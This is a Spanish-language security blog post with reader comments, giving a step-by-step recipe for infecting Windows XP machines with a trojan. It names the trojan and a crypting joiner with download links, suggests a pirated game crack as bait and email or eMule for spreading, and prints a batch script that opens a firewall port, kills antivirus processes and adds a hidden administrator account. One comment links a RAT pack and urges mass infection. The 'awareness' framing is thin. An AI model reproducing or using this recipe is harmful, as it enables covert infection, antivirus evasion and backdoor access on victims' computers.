En este blog informático está reflejada mi experiencia en el mundo de la informática. Mis publicaciones serán sobre seguridad informática e Internet. Las técnicas y herramientas aquí explicadas son para fomentar la seguridad de la información dentro de la filosofía del hacking ético. En línea desde 2005.

Infectar un sistema fácilmente con un troyano.

Este post no es para fomentar la piratería, es un ejemplo de lo importante que es ejecutar archivos que no sabemos de donde proceden.

Pasos para preparar la infección para Windows XP SP2:

1º Buscamos un troyano, son fáciles de encontrar, google es nuestro mejor aliado. En este caso e usado uno muy sencillo y eficaz Cabronator 3.

2º Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecución.

3º Un cebo, un crack de algún juego que este de moda. Este crack será lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano.

4º Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus.
Ejemplo:

:Esta linea abre el puerto del troyano en el firewall de windows Xp
netsh firewall set portopenig tcp 5555 tcp5555 enable

:Estas lineas desactivan el antivirus Avast!
taskkill /f /im ashserv.exe
taskkill /f /im ashdisp.exe
taskkill /f /im ashmaisv.exe
net stop avast! Antivirus
net stop avast! iAVS4 Control Service
net stop avast! Mail Scanner
net stop avast! Web Scanner

:Estas el Panda
taskkill /f /im APVXDWIN.EXE
net stop Panda anti-virus service

:Estas crean el usuario Alvaro con contraseña hola y le da privilegios
net user Alvaro hola /add
net localgroup administradores Alvaro /add

5º Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego.

6º Solo nos queda un medio de difusión: e-mail, emule …

Este es un modelo de infección muy básico, aunque el joiner oculte el troyano cuando se descomprima el antivirus lo detectaría, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volverá activar y encontrara el virus.
Este post es para explicar porque no se deben ejecutar archivos adjuntos de correos electrónicos de fuentes desconocidas o archivos ejecutables descargados de sitios que no son de confianza.

Cactus Joiner 2.0
http://foro.elhacker.net/index.php/topic=131276.0.html

Troyano Cabronator 3 información:
http://www.perantivirus.com/sosvirus/virufamo/cabronat.htm

Troyano Cabronator 3 descarga:
http://kakoweb.iespana.es/kakoweb/files/CaBrONaToR3KiLL.zip
Infectar un sistema fácilmente con un troyano. Infectar un sistema fácilmente con un troyano. Reviewed by Álvaro Paz on miércoles, agosto 23, 2006 Rating: 5

13 comentarios:

Alejandro dijo...

Porque soy un manitas de la PC, voy a probar todo lo que dices un díá de estos... a ver si funciona.
Saludos.

Alvaro Paz dijo...

Pruebalo en tu pc. No lo cuelgues en el emule, la pirateria es un delito.

Un saludo

Alejandro dijo...

Claro que voy a probar en mi PC. Pero que tiene que ver colgar eso en el emule con la piratería, si cuelgo eso en el emule mas allá de la piratería voy a ser un HDP por andar subiendo virus para que otros se infecten sin algún propósito concreto, solo por diversión.

Shaggy dijo...

hola q tal, mira descarge el cactus joiner de la pagina elhacker y cuando lo termine de descagar, lo descomprimo y me da un error "q el dispositivo de win no lo encuetra o algo asi." me lo podes solucinar. mi mail es sebasbeguan@hotmail.com
Gracias

ToRrEnTe dijo...

Gracias por toda esta informacion, hacia dias q llevaba buscando algun tutorial como este... En breves lo probare.

GRACIAS...

Anónimo dijo...

Não consigo executar o cactus joiner..
Alguem pode ajudar ?

Anónimo dijo...

necesito un virus para infectar un ordenador de una chica que esta obsesionada con mi pareja y nos acosa a el, a mi hijo y a mi, espero que me podeis ayudar. gracias

Alvaro Paz dijo...

Hola anónimo
Siento mucho la situación que estas pasando, pero este es un blog que trata sobre seguridad informática y hacking ético, este post solo es una prueba de lo fácil que es hacer que un troyano infecte un sistema o que eluda el sistema de firmas de los antivirus. Decirte que aunque aquí se responda dicha pregunta será censurada lo más pronto posible. Lo mejor que puedes hacer es acudir a las autoridades competentes.
Un saludo

Vlad Tepes dijo...

Hola me gustaria saber si tienes el metodo para desinfectar el equipo sin la necesidad del antivirus.
Es para una tarea de la U. , te agradeceria que la hagas llegar
wladymir_orion@hotmail.com

chao gracias

niko dijo...

Hola quisiera saber como crear un archivo *.bat. de antemano gracias

Alvaro Paz dijo...

Niko aqui un tutorial
http://www.elhacker.net/ProgramacionBat.htm

Anónimo dijo...

aqui unos blinders y el bifrost 1.2b private buils utilicen conexion inversa y usen ares para masificar el troyuano y tener las victimas que quieran.

El tener victimas no es delito.

http://subirarchivos.chuta.org/files/0NQ9FDJL/Pack%20bifrost%20y%20Blinders.rar

Empresas de Seguridad dijo...

Muy interesante, que facil es ser infectado, ovbio, no cualquiera sabe esto.
camaras de seguridad

Este Blog sobre Seguridad Informática está bajo una licencia de Creative Commons, Álvaro Paz. Con la tecnología de Blogger.